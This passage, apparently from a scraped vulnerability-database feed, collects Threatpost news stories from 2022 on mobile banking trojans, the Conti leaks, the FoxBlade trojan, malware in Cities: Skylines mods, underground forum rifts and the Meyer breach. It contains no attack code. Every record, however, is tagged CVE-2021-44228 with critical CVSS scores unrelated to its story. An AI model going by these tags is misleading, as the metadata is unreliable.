For example, the Fakecalls banker, which targets Korean mobile users, is now \u201c[dropping] outgoing calls to the victim\u2019s bank and plays pre-recorded operator responses stored in the trojan\u2019s body,\u201d according to the report.\n\nOther old dogs learning new tricks include the Sova banker, which steals[ cookies](<https://encyclopedia.kaspersky.com/glossary/cookie/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), \u201cenabling attackers to access the user\u2019s current session and personal mobile banking account without knowing the login credentials.\u201d\n\nIn 2021, cybercriminals also went after mobile gaming credentials \u2013 which are often sold later on the darknet or used to steal in-game goods from users. Last year, for example, marked the first time that researchers spotted what they called a[ \u201cGamethief-type mobile trojan](<https://securelist.com/it-threat-evolution-q1-2021-mobile-statistics/102547/#quarterly-highlights>),\u201d aimed at stealing account credentials for the mobile version of PlayerUnknown\u2019s Battlegrounds (PUBG).\n\nAs well, the Vultur backdoor \u2013 found packed into a malicious, fully functional two-factor authentication (2FA) app discovered last month on Google Play \u2013 picked up the capability of using Virtual Network Computing (VNC) to snoop on targets by recording smartphone screens: \u201cWhen the user opens an app that is of interest to attackers, they can monitor the on-screen events,\u201d researchers said.\n\nOther trends spotted in 2021: fewer pandemic/COVID-19 topics used as bait, and more pop-culture lures, such as Squid Game. 
Kaspersky pointed to the [Joker trojan](<https://threatpost.com/updated-joker-malware-android-apps/167776/>) on Google Play, which was found masquerading \u201cas an app with a background wallpaper in the style of Squid Game.\u201d\n\n## Google Play Still Infested\n\nSpeaking of the malware-ridden Play Store, regardless of Google\u2019s attempts to scrub its app store clean, it\u2019s still a bit of a roach motel. ThreatFabric researchers recently sniffed out 300,000 banking trojan [infections](<https://threatpost.com/banking-trojan-infections-google-play/176630/>) in Google Play during a four-month period.\n\nKaspersky also called out what it said were \u201crepeat incidents of malicious code injection into popular apps through advertising SDKs,\u201d as in the \u201csensational\u201d case of [CamScanner](<https://threatpost.com/malicious-app-tallies-100-million-downloads/147748/>): a malicious app spotted in the Google Play store in August 2019 that tallied 100 million downloads.\n\nResearchers noted that they also found [malicious code](<https://threatpost.com/sophisticated-android-spyware-google-play/155202/>) inside ad libraries in [the official client](<https://securelist.com/apkpure-android-app-store-infected/101845/>) for the third-party marketplace known as APKpure, as well as in a [modified WhatsApp build](<https://threatpost.com/custom-whatsapp-build-malware/168892/>).\n\nOne example was particularly alarming, from a security hygiene perspective: the malicious, fully functional 2FA app that hung out in Google Play for [more than two weeks](<https://threatpost.com/2fa-app-banking-trojan-google-play/178077/>), managing to cling to 10,000 downloads. It came loaded with the Vultur stealer malware that targets and swoops down on financial data.\n\nAmong all of last year\u2019s many banking-trojans moves, researchers found the resurgence of Joker especially notable. 
The [malware](<https://threatpost.com/malicious-joker-app-downloads-google-play/177139/>), which zaps victims with premium SMS charges, popped up yet again on Google Play, in a mobile app called Color Message, after which it snuck into more than a half-million downloads before the store collared it.\n\nKaspersky researchers also called out the [Facestealer](<https://blog.malwarebytes.com/detections/android-trojan-spy-facestealer/>) trojan: a family of Android trojans that uses social engineering to rip off victims\u2019 Facebook credentials.\n\nThese trojans most commonly sneak into Google Play by masquerading as a legitimate app, such as a photo editor or VPN service, to which they add a small code snippet to decrypt and launch their payload, the researchers explained. To confound analysis, such malware often uses a command-and-control (C2) server to send unpacking commands that get carried out in multiple steps: \u201cEach decrypted module contains the address of the next one, plus instructions for decrypting it,\u201d they said.\n\n## Most of It\u2019s Still Adware\n\nAt 42 percent, adware was yet again the biggest slice of the mobile malware pie, even though it fell 14.83 percentage points over the prior year. In 2020, adware was also the No. 1 mobile menace, at 57 percent.\n\nNext in prevalence were potentially unwanted riskware apps at 35 percent: a share increase of 14 percentage points, after a sharp decline in 2019\u20132020. As [defined](<https://usa.kaspersky.com/resource-center/threats/riskware>) by Kaspersky, riskware are legitimate programs \u201cthat pose potential risks due to security vulnerability, software incompatibility or legal violations.\u201d\n\nIn third place were trojan threats at 9 percent: a share that rose by 4 percentage points year-over-year.\n\n**_Join Threatpost on Wed. 
Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-22T21:00:36", "type": "threatpost", "title": "Gaming, Banking Trojans Dominate Mobile Malware Scene", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-22T21:00:36", "id": "THREATPOST:CEEE25A4A4491980FA1ECB491795DBA9", "href": 
"https://threatpost.com/gaming-banking-trojans-mobile-malware/178571/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T19:32:09", "description": "Thanks to gray-hat Ukrainian hacker ContiLeaks, the Conti ransomware gang [spilled its guts](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) in late February. Since then, researchers have been poring over the group\u2019s secrets, including a massive trove of chat logs and other doxxed data, including [source code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) for Conti ransomware, TrickBot[ malware](<https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/>), a decryptor and the gang\u2019s administrative panels.\n\nContiLeaks published these internal documents after the ransomware group\u2019s leaders posted an aggressively pro-Russian message on their official site in the aftermath of Russia\u2019s invasion of Ukraine.\n\nLast week, BreachQuest published the [findings](<https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/>) of its week-long deep dive into the data. 
In essence, BreachQuest found that Conti Group operates like a legitimate, above-board high-tech company that hires and even fires contractors and salaried employees alike.\n\nThe dump enabled researchers to sketch out a chart showing key figureheads and the roles they play to grow Conti\u2019s enterprise, plus details on:\n\n * Earnings and costs;\n * How they recruit;\n * Who are the leaders;\n * Who they target: small as well as big targets;\n * How they target and escalate attacks and how they receive payments;\n * How they find their victims;\n * Project Blockchain \u2013 Conti group\u2019s effort to create its own altcoin; and\n * A more thorough understanding of the tools used to spy on and compromise victims.\n\nMarco Figueroa, head of product at BreachQuest, dropped in on the Threatpost podcast to give us some of the intelligence gleaned from the leaked chat logs. Those logs show that over the course of 13 months, Conti spent about $6M on salary, monthly bonuses, tooling and services.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nIts HR team is indicative of how professionally Conti group conducts business: They offer \u201cemployee of the month\u201d and performance review programs, for example.\n\nIn short, Conti group considers itself a legitimate company. Many of its employees don\u2019t even know they\u2019re working for a cybercriminal outfit. 
Some probably choose to look the other way, but the turnover is still high: When they figure it out, they tend to vamoose.\n\nThat\u2019s probably one reason why Conti\u2019s training materials are the best Marco\u2019s ever seen: The group needs to document procedures because they constantly have to train new contractors.\n\nIn fact, security teams themselves should take the training, Marco says, to find out how the ransomware outfit successfully trains its regrettably top-notch cyberattackers.\n\nBy the way, after BreachQuest\u2019s report was published, Marco got a phone call from Russia: a first for him, he said. Either Conti\u2019s a fan of BreachQuest\u2019s research, it was a wrong number, or hey, who knows? Maybe its HR team is expanding its outreach.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/14174903/Russia_calling_Marco-e1647294557940.jpg>)\n\nMarco got a call from Russia. He didn\u2019t answer. Source: Threatpost screen capture.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/031122_Marco_Figueroa_BreachQuest_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s[ podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\n**_Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-14T21:50:45", "type": "threatpost", "title": "Staff Think Conti Group Is a Legit Employer \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-14T21:50:45", "id": "THREATPOST:BA0FA5036C385C822C787514850A67E5", "href": "https://threatpost.com/staff-think-conti-group-legit-employer-podcast/178903/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-01T16:59:59", "description": "\u201cAs tanks rolled into Ukraine, so did malware,\u201d [summarized](<https://twitter.com/andreasharsono/status/1498631557392715777>) humanitarian author Andreas Harsono, 
referring to the [novel malware](<https://blogs.microsoft.com/on-the-issues/2022/02/28/ukraine-russia-digital-war-cyberattacks/>) that Microsoft has named FoxBlade.

On Monday, the company reported that its Threat Intelligence Center (MSTIC) had detected cyberattacks launched against Ukraine’s digital infrastructure hours before Russia’s tanks and missiles began to pummel the country on Thursday.

“Several hours before the launch of missiles or movement of tanks on February 24, Microsoft’s Threat Intelligence Center (MSTIC) detected a new round of offensive and destructive cyberattacks directed against Ukraine’s digital infrastructure,” Microsoft President and Vice-Chair Brad Smith [said](<https://blogs.microsoft.com/on-the-issues/2022/02/28/ukraine-russia-digital-war-cyberattacks/>).

“We immediately advised the Ukrainian government about the situation, including our identification of the use of a new malware package (which we denominated FoxBlade), and provided technical advice on steps to prevent the malware’s success.”

Smith said that within three hours of discovering FoxBlade, Microsoft had added new signatures to its Defender anti-malware service to detect the exploit.

## FoxBlade Specifics

Microsoft has issued a Security Intelligence [advisory](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=DoS:Win32/FoxBlade.A!dha>) about FoxBlade, which is a novel trojan.

While the company shared neither technical specifics nor details about how FoxBlade achieves initial access on targeted machines, the advisory did explain that “This [trojan](<https://www.microsoft.com/security/portal/mmpc/shared/glossary.aspx#trojan>) can use your PC for [distributed denial-of-service (DDoS)](<https://www.microsoft.com/security/portal/mmpc/shared/glossary.aspx##ddos>) attacks without your knowledge.”

Such attacks [topped
thousands](<https://threatpost.com/ddos-attacks-records-q3/176082/>) daily in Q3 and were expected to keep growing, Kaspersky researchers reported in November 2021.

Beyond launching DDoS attacks, FoxBlade also downloads and installs other programs – including other malware – onto infected systems, Microsoft [advised](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Win32/FoxBlade.B!dha>).

## ‘Precisely Targeted’

The cyberattacks – which were ongoing as of Monday, Smith said – have been “precisely targeted,” unlike the indiscriminate malware splattered in the NotPetya attack. The NotPetya cyberattack [targeted hundreds of firms and hospitals worldwide in 2017](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>), including Ukraine’s power grid.

In 2020, the U.S. Department of Justice (DOJ) [charged](<https://threatpost.com/doj-charges-6-sandworm-apt-members-in-notpetya-cyberattacks/160304/>) six Russian nationals for their alleged part in the Ukraine and other cyberattacks.

Regardless of the targeted nature of the current cyberattacks on Ukraine, Smith said Microsoft is still “especially concerned” about recent cyberattacks aimed at Ukrainian civilian digital targets that have been more wide-ranging, including those fired at the financial sector, agriculture sector, emergency response services, humanitarian aid efforts, and energy sector organizations and enterprises.

“These attacks on civilian targets raise serious concerns under the Geneva Convention, and we have shared information with the Ukrainian government about each of them,” Smith said.

Microsoft has also advised the Ukrainian government about recent cyber efforts to steal a range of personally identifiable information (PII), including PII related to health, insurance, transportation and other government data.

Microsoft has
also passed on threat intelligence and defensive strategies to Ukraine’s government so that it could better defend against attacks on military institutions and manufacturers and several other Ukrainian government agencies.

“This work is ongoing,” Smith said.

## The Ongoing Cyberwar

Microsoft’s news about FoxBlade comes as just one of a continuing barrage of cyber assaults targeting both Ukraine and Russia: a barrage that’s included the Conti ransomware gang proclaiming that it’s pro-Russia. Last week, the extortionists [blared](<https://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad.onion.ly/>) out a warning on their blog, threatening to use Conti’s “full capacity” to retaliate in the face of “Western warmongers attempt to target critical infrastructure in Russia or any Russian-speaking region of the world.”

A pro-Ukraine Conti ransomware gang member subsequently [spilled](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) 13 months of the ransomware group’s chats, promising more still to come.

As well, [ESET](<https://twitter.com/ESETresearch/status/1496581903205511181>) and Broadcom’s [Symantec](<https://twitter.com/threatintel/status/1496578746014437376>) last week said that they had discovered a new data wiper malware dubbed [**HermeticWiper**](<https://twitter.com/juanandres_gs/status/1496581710368358400>), that’s been used against hundreds of machines in Ukraine. One of the malware samples was compiled back on Dec. 28, pointing to the attacks having been readied two months ago.

Then, on Jan.
13, a destructive wiper malware – posing as ransomware attacks – named WhisperGate began to [target](<https://threatpost.com/destructive-wiper-ukraine/177768/>) Ukrainian organizations: an attack that analysts said was likely part of Russia’s wider effort to undermine Ukraine’s sovereignty.

As well, in mid-February, institutions central to Ukraine’s military and economy – including government and banking websites – were slammed with a [wave](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>) of DDoS attacks.

## CISA’s Take-Shelter Advice

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) [last week warned](<https://www.cisa.gov/uscert/shields-technical-guidance>) that such attacks could spill over Ukraine’s borders.

“Destructive malware can present a direct threat to an organization’s daily operations, impacting the availability of critical assets and data,” CISA [said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-057a>). “Further disruptive cyberattacks against organizations in Ukraine are likely to occur and may unintentionally spill over to organizations in other countries.”

Other threats related to the Ukraine/Russia crisis include the typical swarm of threat actors who jump into the fray to exploit the day’s headlines, which, in this situation, convey the haze and confusion of war.
Case in point: Malwarebytes has uncovered a spate of [malicious email](<https://threatpost.com/microsoft-accounts-targeted-russian-credential-harvesting/178698/>) bearing the subject line “Microsoft account unusual sign-in activity.”

CISA provided this list of “Immediate Shields Up Actions” to protect against this wide range of cyber threats:

 * Patch [vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).
 * Use [MFA](<https://us-cert.cisa.gov/ncas/tips/ST05-012>).
 * Run antivirus.
 * Enable strong spam filters to prevent phishing emails from reaching end users.
 * Disable ports and protocols that are not essential.
 * Strengthen [controls for cloud services](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar21-013a>).

Source: Threatpost, “Ukraine Hit with Novel 'FoxBlade' Trojan Hours Before Invasion,” published 2022-03-01T16:55:47, https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/. Tagged CVE-2021-44228.

The developer of several popular mods for the Cities: Skylines city-building game has been banned after malware was discovered hidden in their wares.

The modder, who goes by the handle Chaos as well as Holy Water, reportedly tucked an automatic updater into several mods that enabled the author to deliver malware to anybody who downloaded them.

It started last year, when Chaos launched a “redesigned” version of Harmony: a core framework project that most Cities: Skylines mods rely on to work. The author went on to similarly rework other popular mods, and he listed his Harmony redo as a core download: in other words, players would be forced to download it to get dependent mods to work.

But an automatic updater was subsequently discovered, hidden away in Chaos’ Harmony version – an updater that enabled the modder to deliver malware to the devices of those who downloaded it.
As well, the author reportedly poisoned other mods with malicious code that bogged down game-play, forcing players to download yet more tainted mods that Chaos had created as “solutions.”

According to a pinned post on the [Cities: Skylines subreddit](<https://old.reddit.com/r/CitiesSkylines/>), some, but not all, of Chaos’ mods have been removed from the Steam Workshop, and the author’s accounts have been suspended.

## Players Urged to Trash the Mods

The subreddit moderator who posted the warning on Saturday – kjmci – urged players to scrub their systems of anything published by Chaos.

“We recommend in the strongest possible terms that you unsubscribe from all items published by this author and do not subscribe, download, or install any mods, from any source, that may be published by this individual in future,” according to the subreddit post.

[Valve](<https://www.nme.com/brands/valve>) has reportedly yanked several of the mods that feed into the automatic updater and has banned Chaos’ most recent accounts.
However, as [NME](<https://www.nme.com/news/gaming-news/valve-bans-cities-skylines-modder-after-discovery-of-major-malware-risk-3159709>) reports, the modder’s downloads now number around 35,000, meaning that the devices of tens of thousands of gamers have potentially been infected.

Chaos had developed several forks – i.e., modified and reuploaded versions – of popular mods from well-known creators, including Harmony, Network Extensions and Traffic Manager: President Edition.

## Poisoning the Code Chain

Lacing Harmony with malware is particularly pernicious, given that it’s one of the mods that Chaos “redesigned.” Chaos listed the modified version as a core download, as in, a dependency for other mods that players would have to download in order for other dependent mods to work.

Among other functions, Harmony dishes out a patching library to mods that need it and hot-patches older Harmony versions – older versions that, according to Steam’s [community page](<https://steamcommunity.com/workshop/filedetails/?id=2040656402>), are still in use by various mods.

“Users install Harmony (redesigned) for a particular reason, suddenly they get errors in popular mods. The solution provided is to use [Chaos’] versions,” kjmci told NME. “Those versions gain traction and users, and people come across them instead of the originals… and see Harmony (redesigned) marked as a dependency. Users install Harmony (redesigned) with the [automatic updating code] bundled with it. Suddenly you have tens of thousands of users who have effectively installed a trojan on their computer.”

The automatic, malware-delivering updater was found buried in Chaos’ version of Harmony, according to what kjmci told NME.
The moderator opts for anonymity because they’ve been targeted by Chaos in the past, they told the publication.

## Some Mods Rigged with Performance-Slaying Malware

Besides inflicting the trojan on unsuspecting players, Chaos also reportedly planted malicious code that targeted fellow modders and employees of the game’s developer, Colossal Order.

This particular flavor of malware crippled game performance, according to kjmci. The resulting crummy game-play motivated users to download so-called “solutions” that Chaos advertised to help clear up the issues.

Following their fans’ complaints about the sluggish performance, the developers of the targeted mods investigated and discovered the malicious code.

## Chaos Could Return

Just because Valve pulled Chaos’ accounts doesn’t mean the modder won’t be back to spread more malware. As NME notes, a loophole in [the workshop rules](<https://wiki.facepunch.com/gmod/Steam_Workshop_Rules>) for Steam – Valve’s digital distribution service – could allow the author to keep working on mods from another account even if his current accounts stay banned.

Besides which, just because Chaos was banned doesn’t mean that the damage is done. It could, in fact, get a lot worse, kjmci said: “What’s been implemented would let him cryptolock a bunch of machines, create a botnet (and DDoS his enemies?) or mine cryptocurrency.”

Distributed denial-of-service (DDoS) attacks are far from novel in the gaming world.
Last month, for example, a massive Minecraft tournament styled after the Netflix blockbuster Squid Game, known as “SquidCraft,” was hit with a DDoS attack that [took down](<https://threatpost.com/cyberattacks-squid-game-minecraft-andorra-internet/177981/>) the sole (and state-owned) internet service provider in Andorra.

## ‘Classic’ Supply Chain Attack

John Bambenek, principal threat hunter at digital IT and security operations company Netenrich, noted that malware in games or in game mods – or even in pirated/cracked games, for that matter – is a fairly common tactic, “one that often involves American and European actors.”

He told Threatpost on Monday that using a supply chain tactic to get into more victims is “a fairly new tactic,” but unsurprising, given that “our discussion of the potential massive risks of supply chain attacks have inspired new actors to adopt them.”

Casey Bisson, head of product and developer relations at code and security provider BluBracket, told Threatpost on Monday that this is a “classic software supply chain attack similar to what we’ve seen elsewhere,” the difference being how close it gets to the consumer end user.

“There’s lots of open source and commercially sourced software components that go into the apps and games on our mobile devices, but those supply chains are shorter and less complex relative to the components that can go into the software on servers or network devices,” Bisson said via email. “But ‘shorter and less complex’ supply chains are still vulnerable.

“Code is a vast and unprotected attack surface, and there’s no class of software that’s immune from attack.
The more consumers feel these attacks on their personal mobile devices, the more they’ll demand protections.”

Companies can get ahead of consumer demands by implementing automated security practices to ensure product safety, he suggested.

**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) “The Secret to Keeping Secrets,” sponsored by Keeper Security, focused on how to locate and lock down your organization’s most sensitive data. Zane Bond with Keeper Security will join Threatpost’s Becky Bracken to offer concrete steps to protect your organization’s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**

Source: Threatpost, “'Cities: Skylines' Gaming Modder Banned Over Hidden Malware,” published 2022-02-14T17:23:45, https://threatpost.com/cities-skylines-modder-banned-over-hidden-malware/178403/. Tagged CVE-2021-44228.

A rift has formed in the cybercrime underground: one that could strengthen, rather than cripple, the cyber-onslaught of ransomware.

According to a report ([PDF](<https://acn-marketing-blog.accenture.com/wp-content/uploads/2022/03/UPDATED-ACTI-Global-Incident-Report-Ideological-Divide-Blog-14MARCH22.pdf>)) published Monday, ever since the outbreak of war in Ukraine, “previously coexisting, financially motivated threat actors divided along ideological factions.”

“Pro-Ukrainian actors are refusing to sell, buy, or collaborate with Russian-aligned actors, and are increasingly attempting to target Russian entities in support of Ukraine,” wrote researchers from Accenture’s Cyber Threat Intelligence (ACTI). “However, pro-Russian actors are increasingly aligning with hacktivist-like activity targeting ‘enemies of Russia,’ especially Western entities due to their claims of Western warmongering.”

## The Russia-Ukraine Cyber Warzone

Historically, the world’s foremost cybercrime forums have been Russian language. These dark web marketplaces bring together a complex network of advanced persistent threat (APT) and ransomware groups, botmasters, and malware authors – a range of cybercriminals that includes even low-level carders, scammers and script kiddies.

Together, threat actors can [do more](<https://threatpost.com/inside-ransomware-economy/166471/>) than they otherwise could on their own.
For example, botmasters offer access to already compromised devices, software developers improve the malware, and initial access brokers specialize in providing network access via backdoors or security vulnerability exploits for things like Remote Desktop Protocol (RDP).

This productivity is underpinned by not only a shared language, but a shared cultural and political alignment. As ACTI noted in its report, “these forums previously employed a strict, ‘no work in CIS’ policy.” The CIS – Commonwealth of Independent States – is a post-Soviet conglomeration of Russia and central Asian states.

With the outbreak of war, however, this harmony is fracturing.

One poll, published to a cross-site scripting (XSS) forum on March 2, posed the question: “Are you against work on RU and CIS?” 82.6 percent of respondents answered “Yes,” but a surprisingly large minority – 17.4 percent – answered “No.”

## No Love For Moscow

On Feb. 27, an admin from RaidForums – an online marketplace for trafficking data from high-profile database leaks – published a statement titled “RAIDFORUMS SANCTIONS ON RUSSIA.”

> ANY USER FOUND TO BE CONNECTING FROM RUSSIA WILL BE BANNED! THIS IS NOT A JOKE, WE DO NOT SUPPORT THE KREMLIN.

Shortly after the statement was published, RaidForums’ main server was taken down by unknown enemies. It remained down as of March 4, according to ACTI.

The same is true in the opposite direction. The conflict “has led some actors to exclusively sell their services, such as network accesses, to pro-Russian actors,” researchers wrote, and inspired increased attacks against Western targets.

## How This Will Hurt the West

It might appear, at first glance, that civil war in the cyber underground is a good thing.
After all, if they’re fighting each other they won’t have time to annoy the rest of us, right?

In fact, the exact opposite is true.

“The primary effect of this political divide so far,” the researchers observed, “is an increased and prolonged threat from underground actors aimed at Western targets, owed to the galvanization of pro-Russian actors and their targeted efforts that focus on ‘enemies of Russia.’”

Nationalist fervor is even motivating cybercriminals to open their arms and welcome previously shunned ransomware groups.

In response to the [Colonial Pipeline](<https://threatpost.com/colonial-pays-5m/166147/>) attack last May, Western governments and law enforcement began cracking down harder than ever on ransomware groups. In response – to avoid getting the stink on them, too – underground admins banned those groups.

“While ransomware actors did not disappear from the underground,” wrote the researchers, “the ban did make it harder for them to acquire tools, recruit affiliates, or gain exploits or accesses, thereby reducing ransomware actors’ abilities to scale their operations.”

Now, “many underground actors call for the return of ransomware groups to the mainstream underground.”

The consequence of bringing ransomware groups back into the fold “would not only enable those actors to target Western organizations more efficiently but also embolden them, as other underground actors would likely herald ransomware actors’ return and give those ransomware actors perceived moral reason to conduct attacks,” the report concluded.

## Increasingly Targeting Critical Infrastructure

The report described an increasing volume of attacks against the West, “especially in the resources, government, media, financial and insurance industries.”
“The targeting of financial and insurance entities is due to the perception that they are the working arms of Western financial sanctions, whereas the targeting of utilities and resources entities is due to those organizations’ importance as critical national infrastructure.”

Critical infrastructure will be of particular concern, especially if ransomware groups have the political motive – plus the tools of the rest of the underground community at their disposal.

“Organizations within telecommunications, IT, government and critical infrastructure are no doubt on a heightened level of security with the current events in the geopolitical environment,” James McQuiggan of KnowBe4 told Threatpost via email, but “cybersecurity is finally becoming an important topic for the government, considering the number of attacks the various agencies have dealt with over the past number of years.”

If the cyber onslaught in Ukraine extends West, will the United States and the European Union [be ready](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>)?

The answer to that question may arrive soon.

Source: Threatpost, “Cybercrooks’ Political In-Fighting Threatens the West,” published 2022-03-14T13:52:37, https://threatpost.com/cybercrooks-political-in-fighting-threatens-the-west/178899/. Tagged CVE-2021-44228.

Meyer Corp., maker of Farberware and the largest cookware and bakeware distributor in the U.S., has begun notifying 2,747 employees that a cyberattack that occurred on
Oct. 25 compromised their personal data.

Meyer filed a notice with the state of Maine [disclosing the breach](<https://apps.web.maine.gov/online/aeviewer/ME/40/722270ba-5507-4ea4-88d7-b14961dc4c2d.shtml>), which it discovered on Dec. 1. And while the report given to the Maine Attorney General doesn’t specifically name the culprit behind the attack, the Conti ransomware group had already announced on its leak site on Nov. 7 it was in possession of the employee data files, according to a report this week on the [cyberattack](<https://www.securityweek.com/cookware-distribution-giant-meyer-discloses-data-breach>).

Meyer, based in Vallejo, Calif., was storing detailed information on its employees, including names, Social Security numbers, driver’s license numbers and more, along with their name or other personal identifier. Other information which could now potentially be in the hands of the Conti ransomware operators includes drug screening results, immigration information and health and medical information.

The company didn’t reveal many additional details of the strike, but it’s worth noting that Meyer is just one of many companies breached by Conti’s prolific ransomware operations.

## Conti’s Prolific Ransomware Operations

“Ransomware groups such as Conti have been a thorn in the side of organizations from almost all industries and around the world,” Erich Kron, security awareness advocate for KnowBe4, told Threatpost.
“Attacks such as this one by the Conti group are typically a ransomware type of attack that first steals the data, then encrypts it and holds the decryption key ransom.”

But even if the company pays the demanded ransom, its employees, partners and customers remain vulnerable to subsequent shakedowns.

“In addition, the groups generally threaten the victim organization with exposure of the stolen data, which can include customers, employees, financial information or intellectual property, among other things, if they do not pay,” Kron said.

Just this month, KP Snacks, a U.K.-based food giant, was [hit by Conti ransomware](<https://threatpost.com/kp-snacks-crumbs-ransomware-attack/178176/>), causing delays in deliveries across the country.

## Keeping Conti Out of Your Cloud

Keeping such sensitive data stored in the cloud is a common practice, but leaves companies vulnerable to attack if not properly secured, Amit Shaked, CEO of Laminar, explained in response to the Meyer breach.

“Data is no longer a commodity, it’s a currency — as this incident represents. Information within an organization’s network is valuable to both businesses and attackers,” Shaked said via email. “This incident also reminds us that with a majority of the world’s data residing in the cloud, it is imperative that security becomes data-centric and solutions become cloud-native.”

Full integration with the cloud is also critical, Shaked added.

“Solutions need to be completely integrated with the cloud in order to identify potential risks and have a deeper understanding of where the data reside,” he said.
\u201cUsing the dual approach of visibility and protection, data protection teams can know for certain which data stores are valuable targets and ensure proper controls, which allows for quicker discovery of any data leakage.\u201d\n\nKeeping ahead of sophisticated groups like Conti [ransomware operators](<https://threatpost.com/lockbit-blackcat-swissport-ransomware-activity/178261/>) requires a clear, risk-based approach, Aaron Sandeen, CEO and co-founder of Cyber Security Works, added.\n\n\u201cIdeally, organizations should seek out near real-time vulnerability platforms that can centralize threat data and identify, investigate and rank vulnerabilities based on weaponization \u2013 a more effective approach than waiting for reports to be formalized, interpreted and delegated,\u201d advised Sandeen.\n\nBut beyond technical solutions, Kron added that strong security training for employees will also help keep cyberattackers like Conti at bay.\n\n\u201cBecause groups such as Conti and other bad actors use email phishing as a top method of gaining initial network access, it has never been more critical to foster a strong, good, security culture through security awareness training and regular simulated attacks.\u201d\n
